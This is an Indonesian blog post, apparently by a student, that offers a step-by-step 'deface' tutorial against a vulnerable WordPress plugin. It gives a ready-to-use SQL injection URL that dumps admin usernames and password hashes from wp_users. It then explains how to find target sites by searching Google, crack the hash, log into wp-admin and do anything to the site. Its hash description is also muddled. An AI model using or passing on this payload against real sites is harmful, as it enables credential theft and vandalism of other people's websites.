Selamat siang semuanya ....
udah lama nih ga post masalah Deface soalnya saya blm sempet post masih Fokus UN
tapi pada sekarang saya sempatkan untuk Share Tutorial Deface Dengan Exploit Wordpress
oke dari pada mengulurwaktu mending langsung ke Step nya
Tutorial
Ketik dork berikut ke kotak pencarian google :
+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users
Contoh :
Sebelum : www.site.com/wp-content/plugins/photoracer/viewimg.php?id=1
menjadi : www.site.com/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+ 1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users
Nah jika berhasil akan ada penampakan Username dan Pasword Admin web tersebut
Contoh : admin:$P$BfwsoL2ygVgJxpx3lLT9j/0IxRRgDB1
Password tersebut masih dalam bentuk salt/MD5 silahkan anda Crack
Untuk Password dalam bentuk MD5 silahkan Crac disini : Crack
Jika sudah dapat Username dan passwordnya silahkan Login ke web target melalui
www.site.com/wp-admin/
Setelah login terserah kalian mau di apakan web itu
Sekian Tutorial ini saya buat semoga bermanfaat
Share this